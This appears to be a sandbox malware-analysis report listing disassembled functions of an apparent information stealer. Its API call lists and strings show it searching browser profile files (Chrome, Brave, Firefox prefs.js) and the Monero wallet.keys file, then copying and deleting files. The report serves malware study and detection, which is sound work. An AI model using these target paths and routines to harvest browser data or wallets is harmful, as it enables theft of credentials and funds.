                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 4457c7ccdd77a548dea6bcb03aff6c06d2b6f9c4574517f70cce42385ad7e56f
                              • Instruction ID: eb3bcdae0a022a120b09685673cd1bc2d7804caa9997727199a3cbffc4fed535
                              • Opcode Fuzzy Hash: 4457c7ccdd77a548dea6bcb03aff6c06d2b6f9c4574517f70cce42385ad7e56f
                              • Instruction Fuzzy Hash: DD4243B19101089BCB14FB64DC56EFE7379EF44300F418558FA0E96195EE74AB49CBB2
                              Function 00DF4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00DF492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                              • StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                              • StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                              • FindClose.KERNEL32(000000FF), ref: 00DF4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 380095d4a5dbc04a29b275ca1f286f20f4c62eb3ae7b897dddab061f427a95b0
                              • Instruction ID: 339d44da82cef558c8e10f6d5863ea18bb12036d7335520e5a9c0009a4c74efe
                              • Opcode Fuzzy Hash: 380095d4a5dbc04a29b275ca1f286f20f4c62eb3ae7b897dddab061f427a95b0
                              • Instruction Fuzzy Hash: 136123B5600219ABCB34EFA0DC45FFA7378BB48700F048588E64A96145EF75DB858FA1
                              Function 00DF4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DF4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF4587
                              • wsprintfA.USER32 ref: 00DF45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF45BD
                              • StrCmpCA.SHLWAPI(?,00E00FC4), ref: 00DF45EB
                              • StrCmpCA.SHLWAPI(?,00E00FC8), ref: 00DF4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF468B
                              • FindClose.KERNEL32(000000FF), ref: 00DF46A0
                              • lstrcat.KERNEL32(?,0197F168), ref: 00DF46C5
                              • lstrcat.KERNEL32(?,0197D130), ref: 00DF46D8
                              • lstrlen.KERNEL32(?), ref: 00DF46E5
                              • lstrlen.KERNEL32(?), ref: 00DF46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 14f02d25dfa0eb84993d2f095c318582f8ab19344154ba1c993c61b0dddf7f2e
                              • Instruction ID: bf4c2445f627a5dd8345e98d77664f5aeb5024504d2b6fc93d951e502e36dea7
                              • Opcode Fuzzy Hash: 14f02d25dfa0eb84993d2f095c318582f8ab19344154ba1c993c61b0dddf7f2e
                              • Instruction Fuzzy Hash: EC5123B56002189BCB74EF70DC89FEE7378AB58300F408598E64A96184EF75DA848FB1
                              Function 00DF3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00DF3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00DF3EDA
                              • StrCmpCA.SHLWAPI(?,00E00FAC), ref: 00DF3F08
                              • StrCmpCA.SHLWAPI(?,00E00FB0), ref: 00DF3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF406C
                              • FindClose.KERNEL32(000000FF), ref: 00DF4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: e8520b4b8f4837c8cb3ada460dbeb4ebe3c79c894f8b8331a47ee5a618d61eeb
                              • Instruction ID: 2c512ea902ea89844b1e84b1cf480036bb931db533f3a7c04085db185045886c
                              • Opcode Fuzzy Hash: e8520b4b8f4837c8cb3ada460dbeb4ebe3c79c894f8b8331a47ee5a618d61eeb
                              • Instruction Fuzzy Hash: 24510FB6A00219ABCB34EBA0DC85EFA7378BB44300F548588F75996044DE75EB858F71
                              Function 00DEED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00DEED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00DEED55
                              • StrCmpCA.SHLWAPI(?,00E01538), ref: 00DEEDAB
                              • StrCmpCA.SHLWAPI(?,00E0153C), ref: 00DEEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEF2AE
                              • FindClose.KERNEL32(000000FF), ref: 00DEF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: a2fbf02b856bdcb9171906bbdd39cbc8d372ae890657982c64cce3e087f5df3b
                              • Instruction ID: 71b2db4655cba358bf1d4ebcbb55f5ba147223b21216aa91ceb102cf5cd7107e
                              • Opcode Fuzzy Hash: a2fbf02b856bdcb9171906bbdd39cbc8d372ae890657982c64cce3e087f5df3b
                              • Instruction Fuzzy Hash: CFE10FB191111C9ADB24FB64CC52EFE7338EF54340F4581A9B60E66096EE706B8ACF71
                              Function 00DEF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E015B8,00E00D96), ref: 00DEF71E
                              • StrCmpCA.SHLWAPI(?,00E015BC), ref: 00DEF76F
                              • StrCmpCA.SHLWAPI(?,00E015C0), ref: 00DEF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEFAB1
                              • FindClose.KERNEL32(000000FF), ref: 00DEFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 510cc5aec4019a64ab1a5c43cb20a3cd950a5faf1e5969ab966134be55378e64
                              • Instruction ID: b4b45876fc47bef5d8aad456dfd2339c5e6b95d1847a2a80951bbe4b2c223884
                              • Opcode Fuzzy Hash: 510cc5aec4019a64ab1a5c43cb20a3cd950a5faf1e5969ab966134be55378e64
                              • Instruction Fuzzy Hash: A2B131B19001189BCB24FF64DC95AFD7379EF54300F41C1A8A50E9A185EE706B49CBB1
                              Function 00DE16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E0510C,?,?,?,00E051B4,?,?,00000000,?,00000000), ref: 00DE1923
                              • StrCmpCA.SHLWAPI(?,00E0525C), ref: 00DE1973
                              • StrCmpCA.SHLWAPI(?,00E05304), ref: 00DE1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DE1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00DE1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DE1E20
                              • FindClose.KERNEL32(000000FF), ref: 00DE1E32
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 982d35051947c182fc0cb814baf96276e9814ac73be09fe8e8c82d211706fce8
                              • Instruction ID: c46180d4676962ebe346c86c4c92947ff804344e076e73af1ef532fc7e9f4c6d
                              • Opcode Fuzzy Hash: 982d35051947c182fc0cb814baf96276e9814ac73be09fe8e8c82d211706fce8
                              • Instruction Fuzzy Hash: 5612FBB191011C9ACB15FB64CC96AFE7378EF54340F4581A9A60E66091EF706F89CFB1
                              Function 00DEDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E00C2E), ref: 00DEDE5E
                              • StrCmpCA.SHLWAPI(?,00E014C8), ref: 00DEDEAE
                              • StrCmpCA.SHLWAPI(?,00E014CC), ref: 00DEDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEE3E0
                              • FindClose.KERNEL32(000000FF), ref: 00DEE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: c997866e808f1e9350298de319211b44953c27662ce2057ae87e2b42c7fa0ad6
                              • Instruction ID: 776fec258f9195a11cb7f4d3ecbbe8e61c86cc9f27cef1966d55fcdfef305382
                              • Opcode Fuzzy Hash: c997866e808f1e9350298de319211b44953c27662ce2057ae87e2b42c7fa0ad6
                              • Instruction Fuzzy Hash: 03F1CEB191012C9ACB25FB64CC95AFE7338EF14340F8581E9A50E66095EF706B89CF71
                              Function 00DEDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E014B0,00E00C2A), ref: 00DEDAEB
                              • StrCmpCA.SHLWAPI(?,00E014B4), ref: 00DEDB33
                              • StrCmpCA.SHLWAPI(?,00E014B8), ref: 00DEDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEDDCC
                              • FindClose.KERNEL32(000000FF), ref: 00DEDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 1933c7bd46935d337dd3ce7b6e7a626794bd32cd3bf5f6a4f7193d5396bc1aa3
                              • Instruction ID: ed6aa1e9f34d9809eb4dc882e21a7f5dad8716b5b7646231b2bfd773e1a64d4e
                              • Opcode Fuzzy Hash: 1933c7bd46935d337dd3ce7b6e7a626794bd32cd3bf5f6a4f7193d5396bc1aa3
                              • Instruction Fuzzy Hash: E19130B2A0020897CB14FB74DC969FD737DEF84340F41C568F95A96185EE74AB098BB2
                              Function 011BD3B4 Relevance: 11.6, Strings: 8, Instructions: 1594COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
